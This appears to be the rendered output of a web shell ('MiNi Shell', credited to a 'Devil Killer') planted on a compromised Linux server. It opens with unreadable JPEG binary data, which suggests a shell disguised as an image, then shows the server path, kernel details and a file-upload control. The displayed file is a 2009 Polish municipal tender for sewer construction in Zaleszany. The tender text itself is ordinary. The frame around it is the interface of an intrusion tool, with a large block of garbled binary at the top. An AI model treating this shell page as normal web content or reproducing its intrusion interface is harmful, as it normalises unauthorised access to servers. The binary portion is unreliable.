JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090325/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090325/75914-N-2009.html

<p class="kh_header"><b>Zaleszany: Budowę sieci kanalizacyjnej w msc Turbia, Agatówka, Pilchów, rozbudowa i modernizacja gminnej oczyszczalni ścieków, Inwestycja realizowana w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007-2013</b><br>
<b>Numer ogłoszenia: 75914 - 2009; data zamieszczenia: 25.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Zaleszany , ul. Tadeusza Kościuszki 16, 37-415 Zaleszany, woj. podkarpackie, tel. 015 845-94-19, faks 015 845-94-24.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowę sieci kanalizacyjnej w msc Turbia, Agatówka, Pilchów, rozbudowa i modernizacja gminnej oczyszczalni ścieków, Inwestycja realizowana w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> -kolektory grawitacyjne z rur PVC 200 w miejscowości Turbia -  9993 mb
-kolektory grawitacyjne z rur  PVC 200 w  miejscowościach Pilchów i Agatówka - 10236 mb
-kolektory tłoczne z rur  PE  140 w miejscowości Turbia -  1530 mb
-kolektory tłoczne z rur PE 125 w miejscowości Turbia - 2617 mb
-kolektory tłoczne z rur  PE 110 w miejscowości Turbia - 123 mb
-kolektory tłoczne z rur PE 90 w miejscowości Turbia - 1872 mb
-kolektory tłoczne z rur PE 75 w miejscowości Turbia - 295 mb
-kolektory tłoczne z rur PE 125  w miejscowościach Pilchów i Agatówka  -  496mb
-kolektory tłoczne z rur PE 110 w miejscowościach Pilchów i Agatówka  -  1171mb
-kolektory tłoczne z rur PE 90 w miejscowościach Pilchów i Agatówka  - 2504 mb
-przyłącza z rur PVC 160 w miejscowości Turbia  -  7529mb ( 304 szt)
-przyłącza z rur  PVC 160  W miejscowościach Pilchów i Agatówka  -  7402 mb  (  349  Szt)
-wykonanie przepompowni ścieków  w miejscowości  Turbia  -  szt15 
-wykonanie przepompowni ścieków  w miejscowościach Pilchów i Agatówka  -  18 szt 
-zasilanie elektryczne przepompowni ścieków w  miejscowości Turbia
-zasilanie elektryczne przepompowni ścieków w miejscowościach Pilchów i Agatówka
-rozbudowa i modernizacja gminnej oczyszczalni ścieków   w Zaleszanach:

                               Oczyszczalnia ścieków:
-remont budynku technicznego, demontaż istniejących urządzeń do mechanicznego oczyszczania ścieków i montaż nowej kompletnej stacji do  mechanicznego oczyszczania ścieków (usuwanie skratek i piasku)
-podpięcie do stacji mechanicznego oczyszczania ścieków rurociągów tłocznych  podających ścieki z pompowni sieciowej,
-montaż w budynku technicznym układu zasuw
-naprawa lub wymiana istniejącej armatury i pomp w komorze zasuw
-wydzielenie w budynku technicznym pomieszczenia na dmuchawy
-montaż w wydzielonym pomieszczeniu stacji dmuchaw do napowietrzania  komory tlenowej stabilizacji osadu
-adaptacja istniejącego zagęszczacza osadu na komorę tlenowej stabilizacji osadu
-montaż w budynku technicznym (w pomieszczeniu po workownicy) stacji odwadniania osadu na bazie prasy taśmowe
-dobudowa do budynku technicznego pomieszczenia na stanowisko przyczepy do odbioru odwodnionego osadu,
-modernizacja istniejącego dwukomorowego reaktora SBR
-budowa nowego reaktora SBR wraz z wyposażeniem technologicznym
-montaż nowych dmuchaw  oraz kolektorów powietrza z układem przepustnic w budynku socjalno - technicznym
-adaptacja istniejącej wiaty na składowisko odwodnionego osadu oraz pomieszczenia garażowe
-modernizacja zbiornika ścieków dowożonych
-zmiany układu istniejących rurociągów technologicznych związane  z modernizacją i rozbudową oczyszczalni ścieków
-montaż aparatury kontrolno-pomiarowej i automatyki oraz zmiana układu sterowania pracą oczyszczalni ścieków
-uzupełnienie powierzchni dróg i placu manewrowego, wynikające z budowy  reaktora SBR i adaptacji istniejącej wiaty na składowisko odwodnionego osadu oraz pomieszczenia garażowe
-wykonanie instalacji zasilania w energię elektryczną nowych urządzeń oraz modernizacja istniejącego zasilania
     Pompownia sieciowa: 
-remont istniejącego zbiornika pompowni
-adaptacja istniejącej pompowni ścieków na pompownię suchą wraz ze stacją dmuchaw
-montaż stacji dezodoryzacji
-budowa dwóch zbiorników bocznych (buforowych)
-montaż wyposażenia zbiorników buforowych
-montaż rurociągów technologicznych, uzupełnienie dróg i placu.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.25.56.00-5, 45.25.51.27-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium w wysokości:
465 000 zł (słownie:czterysta sześćdziesiąt pięć tysięcy złotych), które może być wnoszone w:
-	pieniądzu,
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
-	poręczeniach i gwarancjach bankowych,
-	gwarancjach ubezpieczeniowych,
-	poręczeniach udzielanych przez podmioty, o których mowa w art 6b ust 5 pkt 2 ustawy z dnia 9-11-2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj z 2007r Nr 42, poz 275 z późn zm)

2.	Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na rachunek bankowy Zamawiającego: Bank Spółdzielczy  w Zaleszanach   nr 09 9439 0007 2001 0000 0329 0005<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie  zamówienie publicznego mogą się ubiegać wykonawcy spełniający następujące warunki określone w art. 22 ust. 1 Ustawy - Prawo zamówień publicznych, tj.:
1.	posiadają uprawnienia do wykonania przedmiotu zamówienia oraz nie podlegają wykluczeniu na       
       podstawie  art.24 ustawy PZP;
2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami 
zdolnymi do wykonania zamówienia;
3.   znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 
Ad. 1
Na potwierdzenie spełnienia warunku posiadania uprawnień  niezbędnych do wykonania zamówienia należy:
a -  przedłożyć aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności 
      gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji
      działalności gospodarczej, w zakresie koniecznym do wykonania zamówienia, wystawionego, nie wcześniej  niż 6 miesięcy przed upływem terminu składania ofert.
b - przedłożyć aktualne zaświadczenie naczelnika właściwego Urzędu Skarbowego potwierdzające, że
      wykonawca nie zalega z opłaceniem podatków lub zaświadczenie, że uzyskał zgodę na zwolnienie,
      odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu
      podatkowego wystawione nie wcześniej niż 3 miesiące przed terminem składania ofert.
c - przedłożyć aktualne zaświadczenie z właściwego oddziału ZUS lub KRUS potwierdzające, że wykonawca
      nie zalega z opłaceniem składek na ubezpieczenia zdrowotne i społeczne lub zaświadczenie, że uzyskał
      zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności - wystawione nie wcześniej niż
      3 miesiące przed terminem składania ofert.
d - przedłożyć aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24
       ust. 1 pkt 4 - 8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania
       ofert.
e -  przedłożyć aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24
       ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania
       ofert.
Ad. 2
Na potwierdzenie spełnienia warunku posiadania niezbędnej wiedzy i doświadczenia oraz dysponowania 
potencjałem technicznym i osobami  zdolnymi do wykonania zamówienia należy:
a - przedłożyć wykaz robót zrealizowanych w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania
      o udzielenie zamówienia, a jeżeli okres działalności jest krótszy - w tym okresie. Warunek zostanie uznany 
       za spełniony, jeżeli w tych latach wykonawca wykonał: co najmniej 4 (cztery) budowy  w zakresie
       robót kanalizacyjnych  wraz z przepompowniami ścieków, o wartości powyżej2 (dwóch) milionów
       złotych każda, a w tym przynajmniej jedna robota o wartości minimum 8 (ośmiu) mln złotych oraz  
       przynajmniej 2 (dwie) roboty  związane z budową bądź  modernizacją oczyszczalni ścieków lub stacji
       uzdatniania wody  z podaniem ich wartości oraz daty i miejsca wykonania, z załączeniem dokumentów
       potwierdzających, że roboty te zostały należycie wykonane (referencje).
b -  przedłożyć wykaz  niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi 
       dysponuje wykonawca.
c - przedłożyć wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia 
      wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia
       niezbędnych do wykonania, a także zakresu wykonywanych przez nich czynności. Na potwierdzenie
      dysponowania osobami zdolnymi do wykonywania zamówienia należy złożyć wykaz osób, które będą 
      uczestniczyć w wykonywaniu zamówienia.
d - przedłożyć dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu 
       zamówienia, posiadają wymagane uprawnienia. Na potwierdzenie należy załączyć uprawnienia budowlane
      do kierowania robotami budowlanymi w specjalności  instalacyjnej w zakresie sieci, instalacji
      i urządzeń wodociągowych i kanalizacyjnych oraz elektroenergetycznych i konstrukcyjno-
      budowlanych, oraz zaświadczenia o członkostwie w Okręgowej Izbie Inżynierów Budownictwa.
e-  Kierownik Budowy - posiada uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie        sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia budowlane, w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących przepisów, - przynależy do właściwej izby samorządu zawodowego; - posiada co najmniej 4 lat doświadczenia zawodowego jako kierownik budowy. - wykaże się doświadczeniem jako Kierownik budowy przy realizacji minimum jednego kontraktu obejmującego swym zakresem budowę kanalizacji o długości min 30 km. - Kierownik robót branży elektrycznej - musi być członkiem właściwej izby samorządu zawodowego oraz posiadać aktualne na dzień składania ofert zaświadczenie o ubezpieczeniu OC a także uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń. Wymagane doświadczenie na stanowisku kierownika robót - co najmniej 3 lata. W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie. 


Ad. 3
Ocena potencjału ekonomicznego Wykonawcy dokonana będzie z punktu widzenia możliwości realizacji zamówienia. Warunek zostanie uznany za spełniony, jeżeli Wykonawca przedłoży:
A - informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w której Wykonawca posiada 
       rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową
       Wykonawcy nie niższą aniżeli 6 mln zł ( słownie: sześć milionów złotych), wystawionej nie wcześniej niż 
       3 miesiące przed upływem terminu składania ofert.
B - polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od 
       odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 1 mln zł
       (słownie: jeden milion złotych).  .
Ocena spełniania powyższych warunków oparta będzie o zasadę spełnia - nie spełnia  i zostanie
przeprowadzona w oparciu o złożone dokumenty i oświadczenia Wykonawcy, wymienione w rozdz. VII
SIWZ.
Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Oferta podpisana przez upełnomocnionych przedstawicieli (wg określonego wzoru - zał. nr 1 do SIWZ). Jeżeli prawo do podpisywania oferty nie wynika z dołączonych dokumentów, należy dołączyć pełnomocnictwo do podpisania oferty.
2.	Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, według wzoru stanowiącego załącznik Nr 2 do SIWZ.
3.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4.	Aktualne zaświadczenie naczelnika właściwego Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłaceniem podatków lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego - wystawione nie wcześniej niż 3 miesiące przed terminem składania ofert.
5.	Aktualne zaświadczenie z właściwego oddziału ZUS lub KRUS potwierdzające, że wykonawca nie zalega z opłaceniem składek na ubezpieczenia zdrowotne i społeczne lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności - wystawione nie wcześniej niż 3 miesiące przed terminem składania ofert.
      6.   Aktualna  informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24ust. 1  pkt 4 - 8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
      7.    Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24ust.1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
8.	 Wykaz robót zrealizowanych w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania, a jeżeli okres działalności jest krótszy - w tym okresie - co najmniej 4 (czterech) budów w zakresie robót kanalizacyjnych  wraz z przepompowniami ścieków, o wartości powyżej2 (dwóch) milionów złotych każda, a w tym przynajmniej jedna robota o wartości minimum 8 (ośmiu) mln złotych oraz 
przynajmniej 2 (dwie) roboty  związane z budową bądź  modernizacją oczyszczalni ścieków lub stacji uzdatniania wody  z podaniem ich wartości oraz daty i miejsca wykonania, z załączeniem dokumentów potwierdzających, że roboty te zostały należycie wykonane (referencje) - zgodnie z załącznikiem Nr 3 do SIWZ.
9.	Wykaz  niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi  dysponuje wykonawca
- załącznik Nr 4 do SIWZ.
10.	  Wykaz osób które będą uczestniczyć w wykonywaniu zamówienia - zał. Nr 5 do SIWZ.
11.	Dokumenty stwierdzające posiadanie przez kierownika robót uprawnień niezbędnych do wykonania zamówienia - uprawnienia budowlane do kierowania robotami budowlanymi w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych oraz elektroenergetycznych i konstrukcyjno-budowlanych, oraz zaświadczenie o członkostwie
w Okręgowej Izbie Inżynierów Budownictwa.
12.	Informacja  banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w której Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową
             Wykonawcy nie niższą aniżeli 6 mln zł ( słownie: sześć milionów złotych),  wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
13.	Polisa ubezpieczeniowa, a w przypadku  jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności (w kwocie nie mniejszej niż 1. 000. 000 zł) .
14.	Dowód wniesienia wadium.
15.	Kosztorys ofertowy według załączonych przedmiarów.
 Brak jakiegokolwiek z wyżej wymienionych dokumentów, lub złożenie dokumentu w niewłaściwej formie  (np. bez podpisu), spowoduje odrzucenie oferty.
       Dokumenty mogą być przedstawione  w  formie  oryginału  lub  kserokopii  poświadczonej   za zgodność z oryginałem przez Wykonawcę /na każdej zapisanej stronie/ z wyjątkiem oświadczeń i pełnomocnictw,  które należy składać w formie oryginału.
        Zamawiający wyklucza z postępowania wykonawców, którzy złożyli nieprawdziwe informacje mające  wpływ na wynik prowadzonego postępowania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zaleszany.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Zaleszany
37-415 Zaleszany
ul. Tadeusza Kościuszki 16
pokój nr. 14.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2009 godzina 11:00, miejsce: Urząd Gminy Zaleszany
37-415 Zaleszany
ul. Tadeusza Kościuszki 16
Sekretariat pokój nr 8.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com